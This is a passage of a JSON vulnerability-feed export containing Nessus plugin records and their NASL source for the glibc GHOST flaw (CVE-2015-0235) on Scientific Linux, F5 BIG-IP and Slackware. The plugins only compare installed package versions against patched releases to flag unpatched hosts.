"vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-11T14:46:46", "description": "A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)", "cvss3": {}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : glibc on SL6.x, SL7.x i386/x86_64 (20150127) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:glibc", "p-cpe:/a:fermilab:scientific_linux:glibc-common", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common", "p-cpe:/a:fermilab:scientific_linux:glibc-devel", "p-cpe:/a:fermilab:scientific_linux:glibc-headers", "p-cpe:/a:fermilab:scientific_linux:glibc-static", "p-cpe:/a:fermilab:scientific_linux:glibc-utils", "p-cpe:/a:fermilab:scientific_linux:nscd", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20150127_GLIBC_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/81038", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81038);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Scientific Linux Security Update : glibc on SL6.x, SL7.x i386/x86_64 (20150127) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1501&L=scientific-linux-errata&T=0&P=2821\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c384376c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"glibc-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-debuginfo-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-debuginfo-common-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-devel-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-static-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-common-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-devel-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-static-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-utils-2.17-55.el7_0.5\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"nscd-2.17-55.el7_0.5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:01:21", "description": "A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker may be able to use this flaw to execute arbitrary code.(CVE-2015-0235)\n\nImpact\n\nA remote attacker may be able to execute arbitrary code.", "cvss3": {}, "published": "2015-09-18T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : GHOST: glibc gethostbyname buffer overflow vulnerability (K16057) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-03-10T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL16057.NASL", "href": "https://www.tenable.com/plugins/nessus/86009", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K16057.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86009);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/10\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n\n script_name(english:\"F5 Networks BIG-IP : GHOST: glibc gethostbyname buffer overflow vulnerability (K16057) (GHOST)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker may be able to use this flaw to execute arbitrary\ncode.(CVE-2015-0235)\n\nImpact\n\nA remote attacker may be able to execute arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K16057\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K16057.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/18\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K16057\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.3.0-11.5.1\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.4.0-11.5.1\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\",\"11.2.1HF14\",\"10.2.4HF11\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.1.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\",\"11.2.1HF14\",\"10.2.4HF11\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\",\"11.2.1HF14\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.1.0-10.2.4\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\",\"11.2.1HF14\",\"10.2.4HF11\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.1.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\",\"11.2.1HF14\",\"10.2.4HF11\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.0.0-11.5.1\",\"10.1.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\",\"11.2.1HF14\",\"10.2.4HF11\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"11.6.0\",\"11.3.0-11.5.1\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.0HF4\",\"11.5.2-11.5.5\",\"11.5.1HF8\",\"11.5.0HF7\",\"11.4.1HF8\",\"11.4.0HF10\");\n\n# PSM\nvmatrix[\"PSM\"] = make_array();\nvmatrix[\"PSM\"][\"affected\" ] = make_list(\"11.0.0-11.4.1\",\"10.1.0-10.2.4\");\nvmatrix[\"PSM\"][\"unaffected\"] = make_list(\"11.4.1HF8\",\"11.4.0HF10\",\"11.2.1HF14\",\"10.2.4HF11\");\n\n# WAM\nvmatrix[\"WAM\"] = make_array();\nvmatrix[\"WAM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\",\"10.1.0-10.2.4\");\nvmatrix[\"WAM\"][\"unaffected\"] = make_list(\"11.2.1HF14\",\"10.2.4HF11\");\n\n# WOM\nvmatrix[\"WOM\"] = make_array();\nvmatrix[\"WOM\"][\"affected\" ] = make_list(\"11.0.0-11.3.0\",\"10.1.0-10.2.4\");\nvmatrix[\"WOM\"][\"unaffected\"] = make_list(\"11.2.1HF14\",\"10.2.4HF11\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:47:19", "description": "New glibc packages are available for Slackware 13.0, 13.1, 13.37, 14.0, and 14.1 to fix a security issue.", "cvss3": {}, "published": "2015-01-29T00:00:00", "type": "nessus", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : glibc (SSA:2015-028-01) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:glibc", "p-cpe:/a:slackware:slackware_linux:glibc-i18n", "p-cpe:/a:slackware:slackware_linux:glibc-profile", "p-cpe:/a:slackware:slackware_linux:glibc-solibs", "p-cpe:/a:slackware:slackware_linux:glibc-zoneinfo", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1"], "id": "SLACKWARE_SSA_2015-028-01.NASL", "href": "https://www.tenable.com/plugins/nessus/81075", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2015-028-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81075);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"SSA\", value:\"2015-028-01\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : glibc (SSA:2015-028-01) (GHOST)\");\n script_summary(english:\"Checks for updated packages in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New glibc packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, and 14.1 to fix a security issue.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.1260924\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ccc24009\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-i18n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-solibs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-zoneinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"glibc\", pkgver:\"2.9\", pkgarch:\"i486\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", pkgname:\"glibc-i18n\", pkgver:\"2.9\", pkgarch:\"i486\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", pkgname:\"glibc-profile\", pkgver:\"2.9\", pkgarch:\"i486\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", pkgname:\"glibc-solibs\", pkgver:\"2.9\", pkgarch:\"i486\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.9\", pkgarch:\"x86_64\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.9\", pkgarch:\"x86_64\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.9\", pkgarch:\"x86_64\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.9\", pkgarch:\"x86_64\", pkgnum:\"7_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"glibc-zoneinfo\", pkgver:\"2014j\", pkgarch:\"noarch\", pkgnum:\"1\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"glibc\", pkgver:\"2.11.1\", pkgarch:\"i486\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", pkgname:\"glibc-i18n\", pkgver:\"2.11.1\", pkgarch:\"i486\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", pkgname:\"glibc-profile\", pkgver:\"2.11.1\", pkgarch:\"i486\", pkgnum:\"9_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", pkgname:\"glibc-solibs\", pkgver:\"2.11.1\", pkgarch:\"i486\", 